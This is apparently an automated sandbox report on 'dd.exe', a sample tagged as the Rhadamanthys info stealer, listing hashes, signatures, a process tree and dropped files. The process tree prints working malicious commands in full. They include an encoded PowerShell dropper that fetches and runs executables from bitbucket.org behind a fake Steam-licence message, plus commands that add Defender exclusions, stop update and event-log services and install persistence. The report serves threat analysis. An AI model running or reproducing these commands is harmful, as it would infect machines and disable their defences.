Analysis
-
max time kernel
31s -
max time network
24s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 08:27
Static task
static1
Behavioral task
behavioral1
Sample
dd.exe
Resource
win10v2004-20240226-en
General
-
Target
dd.exe
-
Size
74KB
-
MD5
8fb7a6bd32200aea3f517923285e39a8
-
SHA1
dc5c1e8293cce5d82c5d7d338fb3cee57d2b997d
-
SHA256
ccc95afa02727297eb7f6bbbe5e06d011ce4656c3b563e2841fad60d471e2f26
-
SHA512
1445bc293350022e9302374df3915e71f3b8bd281db5a43bf67362b002896404e21a58e68963a6203d6ab04dffd5745c2ce1d2fbd650975936b327befa15e3a1
-
SSDEEP
384:UWWFjyor85Z6coSQJ14p9FfVg6FHkosvxB2JeJhrpX5m4KbfocN4UCMfKqIOmRUG:ua5ZRo34pdsvpA1c3UzD9eXOeOiict9
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
liccheck.exedescription pid process target process PID 3028 created 2896 3028 liccheck.exe sihost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 20 3152 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
dd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation dd.exe -
Executes dropped EXE 4 IoCs
Processes:
lic.exeliccheck.exeLicGet.exeebvoxlrooljj.exepid process 3512 lic.exe 3028 liccheck.exe 4960 LicGet.exe 4792 ebvoxlrooljj.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
LicGet.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " LicGet.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
lic.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe lic.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lic.exedescription pid process target process PID 3512 set thread context of 3692 3512 lic.exe dialer.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4876 sc.exe 4344 sc.exe 2228 sc.exe 3948 sc.exe 1408 sc.exe 3028 sc.exe 3880 sc.exe 2516 sc.exe 4488 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exepowershell.exeliccheck.exedialer.exelic.exepowershell.exedialer.exeebvoxlrooljj.exepid process 3152 powershell.exe 3152 powershell.exe 3004 powershell.exe 3004 powershell.exe 3028 liccheck.exe 3028 liccheck.exe 4520 dialer.exe 4520 dialer.exe 4520 dialer.exe 4520 dialer.exe 3512 lic.exe 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3692 dialer.exe 3692 dialer.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3512 lic.exe 3692 dialer.exe 3692 dialer.exe 4792 ebvoxlrooljj.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowercfg.exelic.exepowercfg.exedialer.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeShutdownPrivilege 2888 powercfg.exe Token: SeCreatePagefilePrivilege 2888 powercfg.exe Token: SeDebugPrivilege 3512 lic.exe Token: SeShutdownPrivilege 3908 powercfg.exe Token: SeCreatePagefilePrivilege 3908 powercfg.exe Token: SeDebugPrivilege 3692 dialer.exe Token: SeShutdownPrivilege 636 powercfg.exe Token: SeCreatePagefilePrivilege 636 powercfg.exe Token: SeShutdownPrivilege 2988 powercfg.exe Token: SeCreatePagefilePrivilege 2988 powercfg.exe -
Suspicious use of WriteProcessMemory 47 IoCs
Processes:
dd.exepowershell.exeliccheck.execmd.exelic.exedialer.exelsass.exedescription pid process target process PID 3448 wrote to memory of 3152 3448 dd.exe powershell.exe PID 3448 wrote to memory of 3152 3448 dd.exe powershell.exe PID 3448 wrote to memory of 3152 3448 dd.exe powershell.exe PID 3152 wrote to memory of 3004 3152 powershell.exe powershell.exe PID 3152 wrote to memory of 3004 3152 powershell.exe powershell.exe PID 3152 wrote to memory of 3004 3152 powershell.exe powershell.exe PID 3152 wrote to memory of 3512 3152 powershell.exe lic.exe PID 3152 wrote to memory of 3512 3152 powershell.exe lic.exe PID 3152 wrote to memory of 3028 3152 powershell.exe liccheck.exe PID 3152 wrote to memory of 3028 3152 powershell.exe liccheck.exe PID 3152 wrote to memory of 3028 3152 powershell.exe liccheck.exe PID 3152 wrote to memory of 4960 3152 powershell.exe LicGet.exe PID 3152 wrote to memory of 4960 3152 powershell.exe LicGet.exe PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe PID 3028 wrote to memory of 4520 3028 liccheck.exe dialer.exe PID 5108 wrote to memory of 1064 5108 cmd.exe wusa.exe PID 5108 wrote to memory of 1064 5108 cmd.exe wusa.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3512 wrote to memory of 3692 3512 lic.exe dialer.exe PID 3692 wrote to memory of 616 3692 dialer.exe winlogon.exe PID 3692 wrote to memory of 672 3692 dialer.exe lsass.exe PID 3692 wrote to memory of 960 3692 dialer.exe svchost.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 3692 wrote to memory of 316 3692 dialer.exe dwm.exe PID 3692 wrote to memory of 716 3692 dialer.exe svchost.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 3692 wrote to memory of 924 3692 dialer.exe svchost.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 3692 wrote to memory of 1088 3692 dialer.exe svchost.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 672 wrote to memory of 2380 672 lsass.exe sysmon.exe PID 3692 wrote to memory of 1124 3692 dialer.exe svchost.exe PID 3692 wrote to memory of 1136 3692 dialer.exe svchost.exe PID 3692 wrote to memory of 1152 3692 dialer.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1152
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2380
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2896
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
C:\Users\Admin\AppData\Local\Temp\dd.exe"C:\Users\Admin\AppData\Local\Temp\dd.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeQBkACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAZgBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAhACAAQwBvAG4AbgBlAGMAdAAgAHkAbwB1AHIAIABTAHQAZQBhAG0AIABhAGMAYwBvAHUAbgB0ACAAaQBuACAAbwByAGQAZQByACAAdABvACAAZwBlAHQAIABhACAAbABpAGMAZQBuAHMAZQAuACAATQBhAGsAZQAgAHMAdQByAGUAIAB0AGgAYQB0ACAAeQBvAHUAIABhAHIAZQAgAG4AbwB0ACAAdQBzAGkAbgBnACAAYQBsAHQAZQByAG4AYQB0AGkAdgBlACAAYQBjAGMAbwB1AG4AdAAsACAAbwB0AGgAZQByAHcAaQBzAGUAIABsAGkAYwBlAG4AcwBlACAAdwBpAGwAbAAgAG4AbwB0ACAAYgBlACAAZwBpAHYAZQBuAC4AIAAoAFQAaABpAHMAIABpAHMAIABkAG8AbgBlACAAdABvACAAcAByAGUAdgBlAG4AdAAgAGMAcgBhAGMAawBpAG4AZwApACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAegBxAGUAIwA+ADsAIgA7ADwAIwBsAGIAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAYwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcwBpACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZABhAGcAZQB3AGgALwB0AGUAcwB0ADYAMwA0ADIANQAvAHIAYQB3AC8AMwAwADAANQBkAGQAMgBkADUANwAzADcAOQA4ADMAMQAyADQAMwAwADEAYQBkADgANgA0ADIANwA4AGYAZgA1ADMAMwBjAGMAOQA3ADEAYQAvAEwAZQB2AGkAUAByAG8AdAAuAGUAeABlACcALAAgADwAIwB6AHEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAagBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApACkAPAAjAHQAZgB2ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBkAGEAZwBlAHcAaAAvAHQAZQBzAHQANgAzADQAMgA1AC8AcgBhAHcALwAzADAAMAA1AGQAZAAyAGQANQA3ADMANwA5ADgAMwAxADIANAAzADAAMQBhAGQAOAA2ADQAMgA3ADgAZgBmADUAMwAzAGMAYwA5ADcAMQBhAC8ATABlAHYAaQBhAHQAaABhAG4ALgBlAHgAZQAnACwAIAA8ACMAagBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHYAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBsAGkAYwBjAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBjAGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGQAYQBnAGUAdwBoAC8AdABlAHMAdAA2ADMANAAyADUALwByAGEAdwAvADMAMAAwADUAZABkADIAZAA1ADcAMwA3ADkAOAAzADEAMgA0ADMAMAAxAGEAZAA4ADYANAAyADcAOABmAGYANQAzADMAYwBjADkANwAxAGEALwBMAGUAdgBpAHQAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAeQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB0AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAdwBrAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABnAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAZABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApADwAIwBpAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHoAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQB6AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABpAGMAYwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwBoAHAAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHEAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABpAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAPAAjAGsAcwBrACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Users\Admin\AppData\Roaming\lic.exe"C:\Users\Admin\AppData\Roaming\lic.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1064
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2228 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3880 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2516 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4488 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3948 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988 -
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "FJIEXRSL"4⤵
- Launches sc.exe
PID:1408 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"4⤵
- Launches sc.exe
PID:3028 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:4344 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "FJIEXRSL"4⤵
- Launches sc.exe
PID:4876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"4⤵PID:1184
-
C:\Users\Admin\AppData\Roaming\liccheck.exe"C:\Users\Admin\AppData\Roaming\liccheck.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Roaming\LicGet.exe"C:\Users\Admin\AppData\Roaming\LicGet.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4960
-
C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exeC:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4792 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵PID:2744
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD52152b66bc007aa031bfec4b924dc36e4
SHA11ada87dbaf15ac3d9015168aaebbf3a80d2b27a2
SHA256ee2bd263eeb20744ea6c705d8f374c751cee10c994db2479f05fe717c5f9722e
SHA512e1700ff49b8eb76bd175325e0a21d33cc6251121efe33441095b1aec8aa4d0fed990b7bd40b8333f204986eeebbb9d1cd83612e1e5bbf77619a92e6f252a9011
-
Filesize
2.1MB
MD555af12001648fbcdea3e6360e3cca3f6
SHA18da53c95df58e70a77a9b85efbb5678b756390a0
SHA2568b008106f46a867ae75d3ca71efd3db42c5f56336f05f3edc82941b23cc000bb
SHA512772a5313813e71f7e15d0f1f5841ea46338883534d915045770892a7181d527c47dec485caba6a40d49da7b17a81bf0d9cdac2f16aff22908af249c6422f2be6
-
Filesize
2KB
MD533943ddf7ab410f98e2bff392ed62441
SHA1f27016ff8b33cb2b8df39364d0ae2bf8a2c00e52
SHA256186b4f81ac762e8bda66248fd38ce38190d108b5c430293f64c1dcef5ff32b65
SHA512918d18568c816149d1dd848e1a5bfba9f3e84c9e4e23d4e4982c05cf9366ceac265ba82333aa2a917d2374fd6eb62877f28a92b226baee03918d8608af2d7ede
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
19KB
MD52c264d386f88721214e2e733807cfcba
SHA107ed72407414300c13470cd4bf90344c054f023b
SHA256356bbc26d3f4804ed6e984d8b3ca9c2bd0209dfde5ba5b0870750b6ae716275d
SHA51235f9ff405912047bfa71940cbe40da5f96eec4ddd8930713bb3e1a765b25aff805e19de51eca370082800fb7791aeef84f051d84a223f6303df37ca94b788eae
-
Filesize
17KB
MD5aa5da689b75ca139a0e0618c9f9819a9
SHA1ec7e26f6c65ee2da2523884f817a700b972a9b0a
SHA25649f1b1af173487e946de16985859c99b849637c8205ba4fecf1653b9c32b9275
SHA51233c5b1b0f65cdc81dd1e64b9e978871b1b90eee718f5de5810a3dd3b1a5a9931515638fae7ae97bb09b12111350b7da4b332e2cb7b145b3b6e1be766d17a9644
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
98KB
MD5d505d50ab745d07a7c9cba97717febe4
SHA1528d34e656da344a33a5e3fe27ac43ad5f7dfd0a
SHA25687fad0da502598adcb3da26c2a260cefcec7f383d73b62f94d7c8175812c0fad
SHA51228a8975b6133c366cdcde075acbec07ce7be6fa7a98387dabe5d5c5024368ac9663705d668b1c48f4da6ae8b0f6b95798ac1e4abada6a5a885d431467c8febf1
-
Filesize
2.8MB
MD587f351e454deded1b279aef5a5d632e9
SHA1a936b08d94983f58a31f1207d73fd640fcbabd1a
SHA2565543ea3c67eb8e9bb763a54e80a042dfa7b297d62610e7fe057d0fc7be49212c
SHA5123c40874adc3ea30d147b68ba74aadb0b0228a822137dd0db04daa611a6ecc8ee8e0bfc49fb7242dee60bc2fa6860575f4061c7ff8aa9e4105550c710316f2b8f
-
Filesize
355KB
MD5091267b13791fb80a21044c473e74298
SHA17a4240532744ccb36fbd15f179dd0799b73de881
SHA2567ff6d4737f39fefefa9fc6d1f3dc31fcc968d0d45bb09a364457a0af51af860f
SHA512e69a6d7309bd73a365f088918c7cae13a8b0925f5b395e38c9cd51509d5b451694a660143f5be4d24624b51f4a4a6a1c2c0fac0a650a539386a81e4eaa7e71c2